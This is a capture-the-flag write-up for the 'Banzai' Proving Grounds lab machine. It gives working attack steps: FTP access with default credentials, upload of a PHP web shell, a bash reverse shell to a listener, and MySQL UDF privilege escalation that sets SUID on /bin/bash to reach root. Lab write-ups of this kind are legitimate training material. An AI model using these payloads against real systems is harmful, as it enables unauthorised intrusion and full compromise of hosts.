Banzai - OSPG

September 20, 2021

Tags: | ctf | red | linux |

Read this in "about 5 minutes".

Summary

We’ll obtain the initial access by uploading a reverse shell onto the FTP file share and triggering it via a HTTP web application. We then escalate our privilege by exploiting MySQL UDF vulnerability.

Enumeration

Nmap

We’ll begin with a nmap scan.

$ sudo nmap -sV -p- $IP
PORT     STATE SERVICE    REASON         VERSION
21/tcp   open  ftp        syn-ack ttl 63 vsftpd 3.0.3
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 
25/tcp   open  smtp       syn-ack ttl 63 Postfix smtpd
5432/tcp open  postgresql syn-ack ttl 63 PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.17
8080/tcp open  http       syn-ack ttl 63 Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open  http       syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai

Let’s us start with the FTP service.

FTP Enumeration

We’ll utilize ftp command to access the FTP file share.

The credentials are: admin:admin.

$ ftp $IP
Connected to 192.168.127.56.
220 (vsFTPd 3.0.3)
Name (192.168.127.56:root): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Listing all the accessible shares, we discover a potential web server is pointing to this FTP service.

ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1001     0            4096 Jul 17  2020 .
drwxr-xr-x    7 1001     0            4096 Jul 17  2020 ..
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
226 Directory send OK.

Now, let’s check if we can upload a malicious PHP file onto the service.

From the FTP interactive shell, we run the following command.

ftp> put cmback.php
local: cmback.php remote: cmback.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
31 bytes sent in 0.00 secs (378.4180 kB/s)

The content of cmback.php is:

<?php system($_GET['cmd']); ?>

The output indicates the file is successfully uploaded, we’ll now move on to enumerating HTTP service listening on port 8295

HTTP/8295

Investigate the service, we realize that the files from FTP are accessible here.

To prove the point, we can try to pull the cmback.php file.

This can be done with curl.

$ curl -s http://192.168.127.56:8295/cmback.php

Nothing returns means the file exists. Otherwise, it returns 404 Not Found.

Exploitation

Remote Code Execution (RCE)

To confirm the RCE is achievable, we execute:

$ curl -s http://192.168.127.56:8295/cmback.php\?cmd=id    
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The remaining steps are ease since we already got code execution.

Example of bash reverse shell:

bash -c "bash -i >& /dev/tcp/$ip/$port 0>&1"

It’s worth to URL-encode the payload.

As everything is lined up, we are now ready to pull it …

$ curl -s http://192.168.127.56:8295/cmback.php\?cmd=<bash_revshell_here>    

and get a call back after a few seconds.

$ nc -nlvp 8080                                                                                                                                                                         1 ⨯
listening on [any] 8080 ...
connect to [192.168.49.127] from (UNKNOWN) [192.168.127.56] 45134
bash: cannot set terminal process group (707): Inappropriate ioctl for device
bash: no job control in this shell
www-data@banzai:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

MySQL Credentials

Gathering the system locally divulges a config.php, which secure root credentials of the MySQL service.

www-data@banzai:/var/www$ cat config.php 
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>

MySQL UDF

Further enumeration reveals the current MySQL service is vulnerable to User-Defined Function (UDF) exploit.

More information can be found: here.

Steps to reproduce the attacks:

[1]. Save and upload the raptor_udf2.c exploit onto /dev/shm directory of the target system.

[2]. Compile raptor_udf2.c.

www-data@banzai:/dev/shm$ gcc -g -c raptor_udf2.c
www-data@banzai:/dev/shm$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

[3]. Now, we can drop a MySQL interactive shell with the credentials.

www-data@banzai:/dev/shm$ mysql -uroot -pEscalateRaftHubris123

[4]. From the shell, we continue executing …

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('chmod +s /bin/bash');
+---------------------------------+
| do_system('chmod +s /bin/bash') |
+---------------------------------+
|                               0 |
+---------------------------------+
1 row in set (0.00 sec)

and successfully compromise root access.

mysql> \! sh
$ /bin/bash -p
bash-4.4# whoami
root

Home